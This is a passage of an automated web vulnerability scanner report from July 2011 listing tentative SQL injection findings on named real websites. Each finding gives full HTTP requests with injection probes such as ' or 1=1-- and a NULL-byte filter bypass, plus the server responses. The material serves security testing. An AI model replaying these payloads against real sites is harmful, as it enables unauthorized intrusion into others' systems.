Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; s_sq=cmi-choicemediacom%3D%2526pid%253DVerticals%252520%25253E%252520ADHD%252520%25253E%252520Slideshows%252520%25253E%252520Common%252520Symptoms%252520of%252520ADD%252520%252526%252520ADHD%252520in%252520Women%252520%25253E%252520Hypersensitivity%252520to%252520Noise%25252C%252520Touch%252520%252526%252520Smell%2526pidt%253D1%2526oid%253Dhttp%25253A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit%2526ot%253DA; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:10:53 GMT
Server: Omniture DC/2.0.0
xserver: www500
Content-Length: 0
Content-Type: text/html


1.2. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://minerva.healthcentral.com
Path:   /b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858?[AQB]&ndh=1&t=18/6/2011%2020%3A58%3A29%201%20300&ns=choicemediainc&pageName=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&g=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&r=http%3A//paid.outbrain.com/network/redir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&cc=USD&ch=ADHD%20Vertical&v0=825&events=event4&c1=Slideshows&h1=Verticals%2CADHD%2CSlideshows%2CCommon%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%2CHypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&c2=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c3=1&c4=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c5=Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&c6=Slideshows&c7=slideshow&c8=womensymptoms&c9=childrenshealth&c10=/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&c11=825&c12=2011-07-18&c37=PROMOSLIDE&thcn=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: minerva.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:09:08 GMT
Server: Omniture DC/2.0.0
Content-Length: 407
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858?[AQB]&ndh=1&t=18/6/2011%2020%3A58%3A29%201%20300&ns=choicemediainc&pageName=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&g=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&r=http%3A//paid.outbrain.com/network/redir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&cc=USD&ch=ADHD%20Vertical&v0=825&events=event4&c1=Slideshows&h1=Verticals%2CADHD%2CSlideshows%2CCommon%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%2CHypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&c2=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c3=1&c4=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c5=Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&c6=Slideshows&c7=slideshow&c8=womensymptoms&c9=childrenshealth&c10=/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&c11=825&c12=2011-07-18&c37=PROMOSLIDE&thcn=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: minerva.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:09:08 GMT
Server: Omniture DC/2.0.0
xserver: www636
Content-Length: 0
Content-Type: text/html


1.3. http://networkpresence.com.au//components/com_joomlawatch/img.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   //components/com_joomlawatch/img.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21219339'%20or%201%3d1--%20 and 21219339'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET //components21219339'%20or%201%3d1--%20/com_joomlawatch/img.php?rand=44770 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:22 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET //components21219339'%20or%201%3d2--%20/com_joomlawatch/img.php?rand=44770 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:23 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23711
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au//components21219339' or 1=2-- /com_joomlawatch/img.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&amp;h=308&amp;sw=192" typ
...[SNIP]...

1.4. http://networkpresence.com.au//components/com_joomlawatch/img.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   //components/com_joomlawatch/img.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19093106'%20or%201%3d1--%20 and 19093106'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET //components/com_joomlawatch19093106'%20or%201%3d1--%20/img.php?rand=44770 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:58 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET //components/com_joomlawatch19093106'%20or%201%3d2--%20/img.php?rand=44770 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:01:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:59 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23711
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au//components/com_joomlawatch19093106' or 1=2-- /img.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&amp;h=308&amp;sw=192" typ
...[SNIP]...

1.5. http://networkpresence.com.au/index.php/Services/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /index.php/Services/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 10682034'%20or%201%3d1--%20 and 10682034'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php/Services10682034'%20or%201%3d1--%20/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:03 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /index.php/Services10682034'%20or%201%3d2--%20/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:03:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:04 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23695
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/Services10682034' or 1=2-- /" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&amp;h=308&amp;sw=192" type="text/css" />
...[SNIP]...

1.6. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /index.php/component/option,com_webhosting/Itemid,58/catid,19/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 10454269'%20or%201%3d1--%20 and 10454269'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php/component10454269'%20or%201%3d1--%20/option,com_webhosting/Itemid,58/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:20 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /index.php/component10454269'%20or%201%3d2--%20/option,com_webhosting/Itemid,58/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:03:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:21 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23737
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
